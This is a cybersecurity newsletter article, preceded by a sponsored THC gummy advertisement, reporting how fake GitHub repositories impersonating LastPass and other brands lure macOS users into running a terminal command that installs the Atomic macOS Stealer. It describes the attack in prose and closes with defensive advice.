• Cyber Syrup
  • Posts
  • Fake GitHub Repositories Target macOS Users with Infostealer Malware

Fake GitHub Repositories Target macOS Users with Infostealer Malware

Cybersecurity researchers have uncovered a widespread campaign in which threat actors are impersonating well-known brands to infect macOS users with information-stealing malware

September 23, 2025

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

For years, buying cannabis meant taking a trip to a dispensary, dealing with long lines, limited selection, and inconsistent pricing. But thanks to changing laws and innovative online retailers, buying high-quality THC products is now 100% federally legal—and more convenient than ever.

And when it comes to quality and reliability, Mood is leading the way…

Because they’ve completely flipped the script on cannabis shopping. Instead of memorizing hundreds of confusing strain names – like “Gorilla Glue” and "Purple Monkey Breath" – you simply choose how you want to feel: Creative, Social, Focused, Relaxed, Happy, Aroused, and more.

Each gummy is formulated with the perfect blend of Delta-9 THC and botanicals to deliver the perfect mood.

Want a great night’s sleep? Try the Sleepytime gummies. Need laser focus Mind Magic gummies have you covered. Hotter sex? Try the Sexual Euphoria gummies.

It's cannabis shopping that actually makes sense for “normal” people.

Fake GitHub Repositories Target macOS Users with Infostealer Malware

Cybersecurity researchers have uncovered a widespread campaign in which threat actors are impersonating well-known brands to infect macOS users with information-stealing malware. The campaign, flagged by LastPass, highlights how attackers are abusing trusted platforms like GitHub and search engines to distribute malicious software.

Attack Methodology

The attack begins with fraudulent GitHub repositories that appear in search results due to search engine optimization (SEO) techniques. These repositories claim to provide legitimate macOS applications from trusted companies.

In reality, the links redirect users to malicious websites. In LastPass’s case, two fraudulent repositories impersonated the company, with names such as “LastPass on MacBook” and “LastPass Premium on MacBook.” These were created by a user under the alias modhopmduck476 on September 16, 2025.

Instead of downloading a legitimate program, victims were redirected to macprograms-pro[.]com, where they were instructed to paste a command into their terminal. This command triggered a CURL request that downloaded a malicious payload into the Temp directory.

The Malware: Atomic macOS Stealer (AMOS)

The payload turned out to be Atomic macOS Stealer (AMOS), a well-known information-stealing malware that has been active since 2023. AMOS specializes in stealing:

  • Passwords and credentials

  • Browser autofill data

  • Cryptocurrency wallet information

  • Payment details

In August 2025, CrowdStrike warned about a new variant called SHAMOS, which further increased the malware’s reach through fraudulent ads.

Broader Targeting Strategy

LastPass noted that attackers are not just targeting its brand. They have been impersonating a wide range of organizations, including:

  • Financial institutions

  • Password managers

  • Technology companies

  • AI tools

  • Cryptocurrency wallets

By using multiple GitHub accounts with similar naming patterns, the attackers increase their chances of luring unsuspecting victims.

Historical Context

This campaign appears to be part of a broader strategy that has been ongoing since at least July 2025. Earlier, Deriv security researcher Dhiraj Mishra observed that Homebrew users were targeted through malicious ads leading to fake GitHub repositories.

These attacks exploit users’ trust in Google Ads and GitHub, often bundling the legitimate software installer with a hidden malicious payload that runs silently in the background.

Key Takeaways

  • macOS users are being actively targeted, despite perceptions that the platform is more secure.

  • Trusted platforms like GitHub and Google Ads can be abused, making vigilance essential.

  • AMOS remains a serious threat, capable of stealing financial and personal data with minimal user interaction.

Defensive Measures

Users are encouraged to:

  • Only download software from official vendor websites.

  • Avoid running commands copied from unverified sources.

  • Monitor GitHub repositories for authenticity.

  • Keep macOS security patches and antivirus solutions up to date.